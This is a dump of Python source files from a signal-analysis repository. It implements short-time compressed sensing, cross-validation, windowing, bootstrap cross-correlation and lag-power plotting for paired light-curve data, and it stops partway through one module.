"text": "import sys\nsys.path.append('..')\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm, trange\n\nfrom csa import stcs, istcs\n\ndef main():\n infile1 = 'xdata.dat'\n infile2 = 'odata.dat'\n freqinfo = [0, 0.5, 10000]\n lambdainfo = [1e-1, 1e2, 20]\n nsegment = 1000\n noverlap = 500\n\n # cvdata = cv(infile1, infile2, freqinfo, lambdainfo, 5)\n # plt.errorbar(cvdata[:,0], cvdata[:,1], cvdata[:,2], fmt='o')\n # plt.xscale('log')\n # plt.xlabel(r'$\\lambda$')\n # plt.ylabel('MSE')\n # plt.show()\n\n xdata = np.loadtxt(infile1)\n odata = np.loadtxt(infile2)\n # f, t, X = stcs(infile1, infile2, freqinfo, 1e2, nsegment, noverlap)\n X = np.loadtxt('./x_stcs.dat')\n xrec, orec = istcs(X, freqinfo, xdata[:,0], odata[:,0],\n nsegment, noverlap)\n # x_data = stcs('./gx339_x_fir_original.dat', './gx339_o_fir_original.dat', [0,10,2000], 20, 50, 1)\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5483325123786926,
"alphanum_fraction": 0.575419008731842,
"avg_line_length": 29.601036071777344,
"blob_id": "417ca22ac93aa24f7b09a666b917b1b858e6c8d1",
"content_id": "624d0fb685b9a03940dee071d024e8689067cfe0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5907,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 193,
"path": "/example/windowtest/tools.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib.colors import Normalize\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\nfrom tqdm import tqdm, trange\n\n\ndef get_freq(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\n\ndef _limit_phase(phase_diff):\n if phase_diff < -np.pi: # phase_lag > pi\n phase_diff_out = 2*np.pi + phase_diff\n elif phase_diff >= np.pi:\n phase_diff_out = -2*np.pi + phase_diff\n else:\n phase_diff_out = phase_diff\n return phase_diff_out\n\n\ndef make_summary(x, freqinfo, anti=False):\n\n # x\n x_data = x.reshape(4, int(freqinfo[2])).T\n df_x = pd.DataFrame(x_data, columns=['a', 'b', 'c', 'd'])\n\n # freq\n df_x['freq'] = get_freq(freqinfo)\n df_x['period'] = 1 / df_x.freq.values\n\n # norm\n df_x['norm1'] = np.sqrt(df_x.a.values**2 + df_x.b.values**2)\n df_x['norm2'] = np.sqrt(df_x.c.values**2 + df_x.d.values**2)\n df_x['norm12'] = np.sqrt(df_x.norm1.values**2 + df_x.norm2.values**2)\n\n # lag\n df_x['alpha1'] = np.arctan2(df_x.b[df_x.a != 0], df_x.a[df_x.a != 0])\n df_x['alpha2'] = np.arctan2(df_x.d[df_x.c != 0], df_x.c[df_x.c != 0])\n df_x.fillna(0, inplace=True)\n delta_alpha = list(map(_limit_phase, df_x.alpha2 - df_x.alpha1))\n df_x['lag'] = delta_alpha / (2 * np.pi * df_x.freq.values)\n\n # summary\n df_sum = df_x[['lag', 'norm12', 'norm1', 'norm2',\\\n 'period', 'freq']][df_x.norm12 > 0]\n if anti:\n df_sum = _make_antisum(df_sum)\n\n return df_sum\n\n\ndef phist(X, freqinfo, bins=10, lagrange=None, density=False):\n\n # add axis if X has 1-dimension\n if len(X.shape) == 1:\n X = X[:, np.newaxis]\n\n phists = []\n for i, x in enumerate(X.T):\n # make sumarry\n df_sum = make_summary(x, freqinfo)\n\n # get values\n lags = df_sum.lag\n norms = df_sum.norm12\n\n # get edges\n bin_edges = np.histogram_bin_edges(lags, bins=bins, range=lagrange)\n\n # get index which each value belongs to\n inds = np.digitize(lags, bin_edges) - 1\n\n # add each power\n powsums = np.zeros(len(bin_edges)-1)\n for ind in range(len(powsums)):\n powsums[ind] = norms[inds == ind].sum()\n if density:\n powsums /= powsums.sum()\n phists.append(powsums)\n\n phists = np.squeeze(np.array(phists).T)\n\n return phists, bin_edges\n\n\ndef plot_cbplot(x, freqinfo, threshold=None, lagrange=None,\n bin_edges=None, ax=None, anti=False):\n '''\n '''\n # make summary\n df_sum = make_summary(x, freqinfo, anti=anti)\n\n # figure\n if ax == None:\n fig, ax = plt.subplots()\n\n # color babble plot\n size = list(map(lambda n1, n2: n1/n2 if n1 <= n2 else n2/n1,\n df_sum.norm1, df_sum.norm2))\n log_size = np.log10(1 + np.array(size)) * 750\n im = ax.scatter(df_sum.lag, df_sum.norm12, c=df_sum.freq,\n cmap=cm.jet, alpha=0.8, s=log_size,\n norm=Normalize(freqinfo[0], freqinfo[1]))\n ax.set_ylim(np.min(df_sum.norm12))\n ax.set_yscale('log')\n ax.set_ylabel('Power')\n ax.set_xlabel('Lag')\n xlim = lagrange if lagrange else (bin_edges[0], bin_edges[-1])\n ax.set_xlim(xlim)\n\n # colorbat setting\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes(\"top\", size=\"7%\", pad=\"2%\")\n plt.colorbar(im, cax=cax, orientation='horizontal')\n cax.xaxis.set_ticks_position(\"top\")\n cax.xaxis.set_label_text(\"Frequency\")\n cax.xaxis.set_label_position(\"top\")\n\n return ax\n\n\ndef plot_omplot(x, freqinfo, lagrange=None, bins=10, anti=False,\n lag_mode='standard', threshold=None):\n ''' plot 
omplot which is combined with color babble plot and\n histgram and poer histgram\n '''\n # make summary\n df_sum = make_summary(x, freqinfo, anti=anti)\n # periodic sum\n if lag_mode == 'periodic':\n summ_peri = make_periodicsum(lagrange=lagrange)\n self.df_sum = summ_peri.df_sum\n\n fig = plt.figure(figsize=(8, 2*2+2))\n height = 0.8/2\n ax0 = fig.add_axes([0.10, 0.1+0*height, 0.85, height-0.2])\n\n # get hist value\n h, bin_edges = np.histogram(df_sum.lag, bins=bins, range=lagrange,\n density=True)\n ph, bin_edges = phist(x, freqinfo, bins=bins, lagrange=lagrange,\n density=True)\n\n # figure\n binwidth = np.diff(bin_edges).mean()\n ax0.bar(bin_edges[:-1], h, color=\"r\", width=binwidth,\n align=\"edge\", alpha=0.5, edgecolor=\"k\", label=\"Number\")\n ax0.bar(bin_edges[:-1], ph, color=\"b\", width=binwidth,\n align=\"edge\", alpha=0.5, edgecolor=\"k\", label=\"Power\")\n ax0.set_ylabel('Density')\n ax0.set_xlabel('Lag')\n ax0.legend(loc='best')\n\n # color babble plot\n ax1 = fig.add_axes([0.10, 0.1+1*height-0.2, 0.85, height+0.2],\n sharex=ax0)\n ax1 = plot_cbplot(x, freqinfo, ax=ax1, lagrange=lagrange,\n bin_edges=bin_edges, threshold=threshold)\n ax1.set_xlabel(None)\n plt.setp(ax1.get_xticklabels(), visible=False)\n\n return fig\n\n\ndef main():\n\n freqinfo = [0, 0.5, 2000]\n X = np.loadtxt('../X.dat')\n testrange = [-10, 10]\n\n lagmap, bin_edges = phist(X, freqinfo, lagrange=[-10,10], bins=20)\n time = np.arange(lagmap.shape[1])\n nbins = len(bin_edges) - 1\n lagmap[nbins-1 : nbins+1, :] = 0\n plt.pcolormesh(time, bin_edges[:-1], lagmap, shading='gouraud')\n plt.show()\n\n j = np.random.randint(0, lagmap.shape[-1])\n print(f'index: {j}')\n plot_omplot(X[:,j], freqinfo, lagrange=[-10, 10], bins='auto')\n plt.savefig('omplot_noavesub.png')\n plt.show()\n\n\nif __name__ =='__main__':\n main()\n\n"
},
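`make_summary` above converts the phase difference between the two sinusoid pairs into a time lag via lag = Δα / (2πf), after wrapping Δα into [-π, π). A standalone check with an invented 0.8 s shift (the modulo wrap below is equivalent to `_limit_phase`):

```python
import numpy as np

def wrap_phase(dphi):
    # wrap a phase difference into [-pi, pi), as _limit_phase does
    return (dphi + np.pi) % (2 * np.pi) - np.pi

f = 0.25                                  # Hz
alpha1 = 0.3
alpha2 = alpha1 + 2 * np.pi * f * 0.8     # second signal shifted by 0.8 s
lag = wrap_phase(alpha2 - alpha1) / (2 * np.pi * f)
print(lag)                                # 0.8
```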
{
"alpha_fraction": 0.6678200960159302,
"alphanum_fraction": 0.6816608905792236,
"avg_line_length": 18.266666412353516,
"blob_id": "d28b3013a29b485348153953ad920fe0ea1011b3",
"content_id": "a6f31a2a104ec3576efdc5bddcc9e534f4cb29df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 15,
"path": "/example/bootstrap/tests/test_bootstrap.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import pytest\nimport sys\nsys.path.append('..')\n\nfrom bootstrap import _get_savename\n\[email protected]\ndef dire(tmpdir):\n tmpfile = tmpdir.join('dire')\n yield str(tmpfile)\n tmpfile.remove()\n\n\ndef test_getsavename_name_01():\n assert _get_savename('name', 'dire') == 'name_00.dat'\n"
},
{
"alpha_fraction": 0.4901703894138336,
"alphanum_fraction": 0.5192660689353943,
"avg_line_length": 28.57364273071289,
"blob_id": "4ec29db687a089a1f45579c19392a38a5a33997c",
"content_id": "c374b3a721be94ccc128f4dd16b273fafdfe1712",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3815,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 129,
"path": "/example/bootstrap/bootstrap.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import os\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom csa.csa import stcs, istcs, cv\nfrom csa.cvresult import show_cvdata, lambda_fromcvdata\nfrom ccfbootstrap import ccfbootstrap\n\n\n# analysis option\nCV = 0\nSTCS = 0\nISTCS = 1\n\nCCF = 1\n\nFIGSHOW = 1\n\ndef _get_savename(basename: str, path_to_dir, digit=3, ext='dat'):\n files = os.listdir(path_to_dir)\n for i in range(10**(digit)):\n suffix = str(i).rjust(digit, '0')\n search_file = basename + '_' + suffix + '.' + ext\n if (search_file in files) is False:\n path_to_out = os.path.join(path_to_dir, search_file)\n return path_to_out\n break\n\ndef main():\n\n # constant\n tperseg = 1000\n toverlap = 500\n basewidth_triang = 2*(tperseg - toverlap)\n\n # load data\n data1 = np.loadtxt('../xdata.dat')\n data2 = np.loadtxt('../odata.dat')\n n1 = data1.shape[0]\n n2 = data2.shape[0]\n freqinfo = [0, 0.5, 2000]\n\n # cross-validation\n if CV:\n cv_sta = np.random.randint(toverlap, np.min([n1, n2]) - tperseg)\n cv_end = cv_sta + tperseg\n print(f'time range of cv: [{cv_sta}, {cv_end}]')\n cvdata = cv(data1[cv_sta:cv_end], data2[cv_sta:cv_end], freqinfo,\n [1e-2, 1e3, 20], droprate=.5)\n np.savetxt('cvdata.dat', cvdata)\n\n # plot cvdata\n show_cvdata(cvdata)\n plt.savefig('cvcurve.png')\n if FIGSHOW:\n plt.show()\n cvdata = np.loadtxt('./cvdata.dat')\n show_cvdata(cvdata)\n plt.savefig('cvcurve.png')\n plt.close()\n lam_min = lambda_fromcvdata(cvdata, mode='min')\n print(f'lam_min = {lam_min:.3f}')\n\n\n # bootstrap\n if STCS:\n for k in range(10):\n freqs, t, X = stcs(data1, data2, freqinfo, lam_min,\n tperseg, toverlap, droprate=0.5)\n filename = _get_savename('X', 'Xs')\n np.savetxt(filename, X)\n\n if ISTCS:\n filesX = os.listdir('Xs')\n print(f'number of X: {len(filesX)}')\n for fileX in filesX:\n path_to_fileX = os.path.join('Xs', fileX)\n X = np.loadtxt(path_to_fileX)\n\n # istcs\n data1_rec, data2_rec = istcs(X, data1, data2, freqinfo,\n tperseg, toverlap,\n basewidth=basewidth_triang)\n fname_data1 = _get_savename('data1', 'Ys')\n np.savetxt(fname_data1, data1_rec)\n fname_data2 = _get_savename('data2', 'Ys')\n np.savetxt(fname_data2, data2_rec)\n\n # ccf\n if CCF:\n files_in_Ys = os.listdir('Ys')\n files_data1 = sorted([f for f in files_in_Ys if ('data1' in f)])\n files_data2 = sorted([f for f in files_in_Ys if ('data2' in f)])\n files_data1 = list(map(lambda f, suf: suf + f,\n files_data1,\n np.repeat('Ys/', len(files_data1))))\n files_data2 = list(map(lambda f, suf: suf + f,\n files_data2,\n np.repeat('Ys/', len(files_data2))))\n\n # collect data1\n Y1 = []\n for file_data1 in files_data1:\n data1 = np.loadtxt(file_data1)\n t1 = data1[:,0]\n Y1.append(data1[:,1])\n Y1 = np.array(Y1)\n\n # collect data2\n Y2 = []\n for file_data2 in files_data2:\n data2 = np.loadtxt(file_data2)\n t2 = data2[:,0]\n Y2.append(data2[:,1])\n Y2 = np.array(Y2)\n\n for y1 in Y1:\n plt.plot(t1, y1, alpha=.3)\n plt.show()\n\n lags, c_low, c_med, c_hig = ccfbootstrap(Y1, Y2, maxlags=200)\n plt.fill_between(lags, c_low, c_hig, alpha=.5)\n plt.plot(lags, c_med)\n plt.show()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5537090301513672,
"alphanum_fraction": 0.5800132155418396,
"avg_line_length": 31.219858169555664,
"blob_id": "773cce61a57678bc5ea6e29e523f7751327f4a59",
"content_id": "86bdbd6826d2c08618d23b63967e3e15c6dd7ef4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9086,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 282,
"path": "/csa/run.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from concurrent.futures import ProcessPoolExecutor\n# import os\n\nimport numpy as np\nfrom sklearn.model_selection import KFold\nfrom tqdm import tqdm\n\nfrom csa.make_matrix import mkmat_cs\nfrom csa.fista import fista\nfrom csa.window_function import WindowGenerator\nfrom csa.summary_handler import SummaryNew\nfrom csa.deco import stopwatch\n\n\n__all__ = ['cs', 'cv', 'stcs', 'istcs']\n\n\n# functions for csa\ndef _sub_ave(flux):\n f = np.array(flux)\n f_out = f - f.mean()\n return f_out\n\n\ndef _get_minmax(*args):\n a = np.hstack(args)\n return a.min(), a.max()\n\n\ndef _get_frecvec(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\n\ndef _complement_index(ind):\n comp = np.ones(len(ind), dtype=bool)\n comp[ind] = False\n return comp\n\n\ndef _query_lightcurve(data, timerage):\n data_out = data[np.where((timerage[0] <= data[:, 0]) &\n (data[:, 0] < timerage[1]))]\n return data_out\n\n\ndef _drop_sample(data, rate):\n n_data = data.shape[0]\n n_drop = int(n_data * rate)\n index_drop = np.random.RandomState().choice(\n n_data - 1, n_drop, replace=False)\n data_del = np.delete(data, index_drop, 0)\n return data_del\n\n\ndef _segment_time(t_sta, t_end, tperseg, toverlap):\n # set constant\n tstep = tperseg - toverlap\n nstep = (t_end - t_sta - tperseg) // tstep + 2\n\n # calcurate edge of lefts and rights\n edge_left = t_sta + np.arange(nstep)*tstep\n edge_right = t_sta + tperseg + np.arange(nstep)*tstep\n\n # concat edges\n segranges = np.array(list(zip(edge_left, edge_right)))\n return segranges\n\n\ndef _search_index(original, condition):\n lis = list(original)\n indices = np.array(list(map(lambda a: lis.index(a),\n condition)))\n return indices\n\n\n# main functions; cs, cv stcs istcs\ndef cs(data1, data2, freqinfo, lam):\n freqs, x = fista(data1, data2, freqinfo, lam)\n return freqs, x\n\n\ndef _cv(data1, data2, freqinfo, lam, nfold=5):\n\n # freq vector\n freqs = _get_frecvec(freqinfo)\n\n # get nfold index\n kf1 = KFold(nfold, shuffle=True)\n kf2 = KFold(nfold, shuffle=True)\n sp1 = kf1.split(data1)\n sp2 = kf2.split(data2)\n\n # cross-validation\n rms = np.zeros(nfold)\n for i, ((i_tr1, i_te1), (i_tr2, i_te2)) in enumerate(zip(sp1, sp2)):\n # split data into one for train and test\n data1_tr, data1_te = data1[i_tr1], data1[i_te1]\n data2_tr, data2_te = data2[i_tr2], data2[i_te2]\n\n # calcurate rms\n freq, x_tr = fista(data1_tr, data2_tr, freqinfo, lam)\n A_mat_te = mkmat_cs(data1_te[:, 0], data2_te[:, 0], freqs)\n y_te = np.dot(A_mat_te, x_tr)\n data_te = np.hstack([data1_te[:, 1], data2_te[:, 1]])\n rms[i] = np.sqrt(np.dot((data_te - y_te).T, data_te - y_te))\n return rms.mean(), rms.std()\n\n\n@stopwatch\ndef cv(data1, data2, freqinfo, lambdainfo, nfold=5,\n droprate=None, max_workers=None, set_verbose=True):\n\n # use window and subtract average\n data1_win = data1.copy()\n data2_win = data2.copy()\n\n # drop some samples\n if droprate:\n data1_win = _drop_sample(data1, droprate)\n data2_win = _drop_sample(data2, droprate)\n\n # use window function\n t_minmax = _get_minmax(data1[:, 0], data2[:, 0])\n window = WindowGenerator(t_minmax)\n window.hann()\n data1_win[:, 1] = _sub_ave(data1_win[:, 1]) * window.gene(data1_win[:, 0])\n data2_win[:, 1] = _sub_ave(data2_win[:, 1]) * window.gene(data2_win[:, 0])\n\n # set lambda info\n lambdas = np.logspace(np.log10(lambdainfo[0]),\n np.log10(lambdainfo[1]),\n lambdainfo[2])\n # print('lambdas:\\n{}'.format(lambdas))\n\n 
# cross-validation with multi process\n cvdata = np.zeros((3, lambdas.shape[0])).T\n cvdata[:, 0] = lambdas\n with ProcessPoolExecutor(max_workers) as executor:\n futures = tqdm([executor.submit(_cv, lam=lam,\n data1=data1_win,\n data2=data2_win,\n freqinfo=freqinfo)\n for lam in lambdas],\n disable=not set_verbose) # tqdm option\n for k, future in enumerate(futures):\n cvdata[k, 1:] = future.result()\n\n return cvdata\n\n\ndef _stcs(data1, data2, segrange, freqinfo, lam, droprate=None):\n # print(f'start {segrange}')\n\n # query time which is in segrange\n data1_seg = _query_lightcurve(data1, segrange)\n data2_seg = _query_lightcurve(data2, segrange)\n data1_seg_win = data1_seg.copy()\n data2_seg_win = data2_seg.copy()\n\n # use window fuction\n window = WindowGenerator(segrange)\n window.hann()\n data1_seg_win[:, 1] = \\\n _sub_ave(data1_seg[:, 1]) * window.gene(data1_seg[:, 0])\n data2_seg_win[:, 1] = \\\n _sub_ave(data2_seg[:, 1]) * window.gene(data2_seg[:, 0])\n\n # drop rows\n if droprate:\n data1_seg_win = _drop_sample(data1_seg_win, droprate)\n data2_seg_win = _drop_sample(data2_seg_win, droprate)\n\n # estimate\n freq, x_seg = fista(data1_seg_win, data2_seg_win, freqinfo, lam)\n return x_seg\n\n\n@stopwatch\ndef stcs(data1, data2, freqinfo, lam, tperseg, toverlap,\n window='hann', droprate=None, max_workers=None,\n set_verbose=True):\n\n # calucurate segranges\n t_min, t_max = _get_minmax(data1[:, 0], data2[:, 0])\n segranges = _segment_time(t_min, t_max, tperseg, toverlap)\n\n # short time CS with multithread\n X = np.zeros((freqinfo[2]*4, segranges.shape[0]))\n with ProcessPoolExecutor(max_workers) as executor:\n futures = tqdm([executor.submit(_stcs, segrange=segrange,\n data1=data1, data2=data2,\n freqinfo=freqinfo,\n lam=lam, droprate=droprate)\n for segrange in segranges],\n disable=not set_verbose) # tqdm option\n for i, future in enumerate(futures):\n X[:, i] = future.result()\n\n # output\n t = np.append(segranges[:, 0], segranges[-1, 0]+(tperseg-toverlap))\n freq = _get_frecvec(freqinfo)\n # np.savetxt('X.dat, X)\n return freq, t, X\n\n\ndef _istcs(x, segrange, data1, data2, freqinfo, need_sect, add_ave, **winargs):\n # print(f'start {segrange}')\n\n # query time which is in segrange\n data1_seg = _query_lightcurve(data1, segrange)\n data2_seg = _query_lightcurve(data2, segrange)\n data1_seg_out = data1_seg.copy()\n data2_seg_out = data2_seg.copy()\n\n # make summary instance\n # (later summary instance -> x instance)\n summ = SummaryNew(x, freqinfo)\n y1, y2 = summ.pred(data1_seg[:, 0], data2_seg[:, 0])\n\n # reconstruct\n window = WindowGenerator(segrange)\n window.triang(winargs['winargs']['basewidth'])\n mean1_seg = data1_seg[:, 1].mean() if add_ave else 0\n mean2_seg = data2_seg[:, 1].mean() if add_ave else 0\n wy1 = window.gene(data1_seg[:, 0]) * (y1 + mean1_seg)\n wy2 = window.gene(data2_seg[:, 0]) * (y2 + mean2_seg)\n\n # substitution; to conserve energy, it is divided by\n # Energy Correction Factor (ECF)\n win_sect = window.sect\n data1_seg_out[:, 1] = wy1 * (need_sect/win_sect)\n data2_seg_out[:, 1] = wy2 * (need_sect/win_sect)\n\n # print(f'finish {segrange}')\n return data1_seg_out, data2_seg_out\n\n\n@stopwatch\ndef istcs(X, data1, data2, freqinfo, tperseg, toverlap,\n max_workers=None, set_verbose=True, add_ave=True,\n **winargs):\n '''\n T: ndarray\n The series of start time of each segment\n '''\n # calucurate segranges\n t_min, t_max = _get_minmax(data1[:, 0], data2[:, 0])\n segranges = _segment_time(t_min, t_max, tperseg, toverlap)\n\n # prepare 
ndarray for reconstraction\n y1_rec = data1.copy()\n y2_rec = data2.copy()\n y1_rec[:, 1] = np.zeros(data1.shape[0])\n y2_rec[:, 1] = np.zeros(data2.shape[0])\n\n with ProcessPoolExecutor(max_workers) as executor:\n need_sect = (tperseg - toverlap) * 1\n futures = tqdm([executor.submit(_istcs, x=x, segrange=segrange,\n data1=data1, data2=data2, freqinfo=freqinfo,\n need_sect=need_sect, add_ave=add_ave,\n winargs=winargs)\n for segrange, x in zip(segranges, X.T)],\n disable=not set_verbose) # tqdm option\n for i, future in enumerate(futures):\n # get results\n data1_seg_out, data2_seg_out = future.result()\n\n # search index\n indices_t1 = _search_index(data1[:, 0], data1_seg_out[:, 0])\n indices_t2 = _search_index(data2[:, 0], data2_seg_out[:, 0])\n\n # add results\n y1_rec[indices_t1, 1] = \\\n y1_rec[indices_t1, 1] + data1_seg_out[:, 1]\n y2_rec[indices_t2, 1] = \\\n y2_rec[indices_t2, 1] + data2_seg_out[:, 1]\n\n return y1_rec, y2_rec\n"
},
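`_segment_time` in `run.py` tiles the observation into overlapping windows. A standalone copy run on round numbers shows the layout (note the final segment can extend past `t_end`):

```python
import numpy as np

def segment_time(t_sta, t_end, tperseg, toverlap):
    # same arithmetic as _segment_time above
    tstep = tperseg - toverlap
    nstep = (t_end - t_sta - tperseg) // tstep + 2
    edge_left = t_sta + np.arange(nstep) * tstep
    edge_right = t_sta + tperseg + np.arange(nstep) * tstep
    return np.array(list(zip(edge_left, edge_right)))

print(segment_time(0, 3000, 1000, 500))
# six half-overlapping segments: (0,1000), (500,1500), (1000,2000),
# (1500,2500), (2000,3000), (2500,3500)
```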
{
"alpha_fraction": 0.4954954981803894,
"alphanum_fraction": 0.4954954981803894,
"avg_line_length": 28.382352828979492,
"blob_id": "8bd2b3530bbc25dbea320d2e1bc00a2deb9bbb00",
"content_id": "85e1a773d572e6e0bcda73b7428b8bb821f4256c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 999,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 34,
"path": "/csa/deco.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import time\nimport os\n\n\ndef stopwatch(func):\n def wrapper(*arg, **kargs):\n try:\n if kargs['set_verbose'] is False:\n res = func(*arg, **kargs)\n else:\n raise KeyError\n except KeyError:\n start = time.time()\n print(f'start {func.__name__}')\n res = func(*arg, **kargs)\n dura = (time.time() - start)\n print(time.strftime(f'finish {func.__name__}: %H:%M\\'%S\\\"',\n time.gmtime(dura)))\n return res\n return wrapper\n\n\ndef change_directory(path_to_dir):\n def _change_directory(func):\n def wrapper(*args, **kargs):\n current_dir = os.getcwd()\n if os.path.exists(path_to_dir) is False:\n os.makedirs(path_to_dir)\n os.chdir(path_to_dir)\n results = func(*args, **kargs)\n os.chdir(current_dir)\n return(results)\n return wrapper\n return _change_directory\n"
},
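Usage of the `stopwatch` decorator above: it times and prints unless the wrapped call passes `set_verbose=False`. A toy example, assuming the `csa` package is importable (the function `slow_add` is made up):

```python
import time
from csa.deco import stopwatch

@stopwatch
def slow_add(a, b, set_verbose=True):
    # set_verbose is forwarded to the function, so it must accept it
    time.sleep(0.2)
    return a + b

print(slow_add(1, 2))                     # prints start/finish lines, then 3
print(slow_add(1, 2, set_verbose=False))  # silent, just 3
```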
{
"alpha_fraction": 0.5927272439002991,
"alphanum_fraction": 0.607272744178772,
"avg_line_length": 20.153846740722656,
"blob_id": "8164213f882209d3322fd9f0b66856cad3edc53b",
"content_id": "5909455185a66987c6113de8eefe8aa7d408d2e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 275,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
"path": "/setup.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nsetup(\n name='csa',\n version='0.0.1',\n description=\"common-signal analysis tool\",\n long_description=\"\",\n author='Tomoki Omama',\n classifiers=[\n \"Development Status :: 1 - Planning\"\n ],\n packages=['csa']\n)\n"
},
{
"alpha_fraction": 0.4549036920070648,
"alphanum_fraction": 0.4943082332611084,
"avg_line_length": 25.25287437438965,
"blob_id": "3967cc01c7243de16349bea1a90d5f9b36442365",
"content_id": "ab24f9098c9ca4cf5e640c128da5a01040624310",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2284,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 87,
"path": "/csa/window_function.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\ndef _triang(t, basewidth, T):\n bw = basewidth\n if (((T-bw)/2 <= t) & (t < T/2)):\n w = 2*t/bw - (T-bw)/bw\n elif ((T/2 <= t) & (t < (T+bw)/2)):\n w = -2*t/bw + (T+bw)/bw\n else:\n w = 0\n return w\n\ndef _hann(t, T):\n w = 0.5 - 0.5*np.cos(2*np.pi*t/T)\n return w\n\nclass WindowGenerator():\n\n def __init__(self, segrange):\n\n # set first time\n self.t0 = segrange[0]\n self.tm1 = segrange[1]\n self.T = segrange[1] - segrange[0]\n\n # make function\n w = lambda t: 0*t + 1\n self.func = w\n\n def __call__(self, t):\n assert np.all((t >= self.t0) & (t <= self.tm1)), ValueError(\n f't must be between {self.t0:.3f} <= t <= {self.tm1:.3f}')\n return self.func(t - self.t0)\n\n def gene(self, t):\n assert np.all((t >= self.t0) & (t <= self.tm1)), ValueError(\n f't must be between {self.t0:.3f} <= t <= {self.tm1:.3f}')\n return self.func(t - self.t0)\n\n def acf(self):\n n = 1000\n t = np.linspace(self.t0, self.tm1, n)\n w = self.func(t - self.t0)\n acf = 1 / (np.sum(w)/n)\n return acf\n\n\n def ecf(self):\n n = 1000\n t = np.linspace(self.t0, self.tm1, n)\n w = self.func(t - self.t0)\n ecf = np.sqrt(1 / (np.sum(w**2)/n))\n return ecf\n\n def hann(self):\n self.func = np.frompyfunc(lambda t: _hann(t, self.T),\n 1, 1)\n self.sect = 0.5 * self.T\n self.ecf = 1.63\n self.acf = 2.0\n\n def triang(self, basewidth):\n # set triangular function as universal function by using\n # numpy.frompyfunc\n self.func = np.frompyfunc(lambda t: _triang(t, basewidth, self.T),\n 1, 1)\n self.sect = 0.5 * basewidth\n self.acf = (basewidth/2)/self.T\n self.ecf = 2/3 * basewidth #?\n\n\ndef main():\n np.random.seed(2021)\n t = np.arange(1, 101) + np.random.normal(0, 0.1, 100)\n w = Window(t)\n tt = np.linspace(2, 99, 10000)\n w.triang(basewidth=2)\n plt.plot(tt, w(tt))\n w.hann()\n plt.plot(tt, w(tt))\n plt.legend(['triang', 'hann'])\n plt.show()\n\nif __name__ == '__main__':\n main()\n"
},
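The constants hard-coded in `hann()` above follow from the window's mean and mean square: ACF = 1/mean(w) and ECF = 1/sqrt(mean(w²)). A quick standalone numerical check for the Hann shape used in `_hann`:

```python
import numpy as np

T = 1.0
t = np.linspace(0.0, T, 100001)
w = 0.5 - 0.5 * np.cos(2 * np.pi * t / T)   # Hann window, as in _hann

print(1 / w.mean())                 # amplitude correction factor, ~2.0
print(1 / np.sqrt((w**2).mean()))   # energy correction factor, ~1.633
```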
{
"alpha_fraction": 0.49778521060943604,
"alphanum_fraction": 0.5201491117477417,
"avg_line_length": 33.34508514404297,
"blob_id": "3a46c00a46fbe3632483a93ad94631fd0aa07604",
"content_id": "baeeaf58008836369fc12c93f73093fb3a93c2e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18512,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 539,
"path": "/csa/summary_handler.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import math\nimport os\n\nfrom tqdm import tqdm\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import Normalize\n# from mpl_toolkits.axes_grid1.colorbar import colorbar\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\nimport scipy.stats as stats\n# import seaborn as sns; sns.set()\n# sns.set_style(\"whitegrid\")\n\nfrom csa.signiftest import LagSignifTest\n\n__all__ = ['read_summary']\n\ndef read_summary(path_to_summary, path_to_x, freq_info):\n\n df_sum = pd.read_csv(\n path_to_summary, sep=' ',\n names=[\"lag\", \"norm12\", \"norm1\", \"norm2\", \"period\", \"freq\"])\n x_vec = np.loadtxt(path_to_x)[:, 1]\n\n return Summary(df_sum, x_vec, freq_info)\n\ndef limit_phase(phase_diff):\n if phase_diff < -np.pi: # phase_lag > pi\n phase_diff_out = 2*np.pi + phase_diff\n elif phase_diff >= np.pi:\n phase_diff_out = 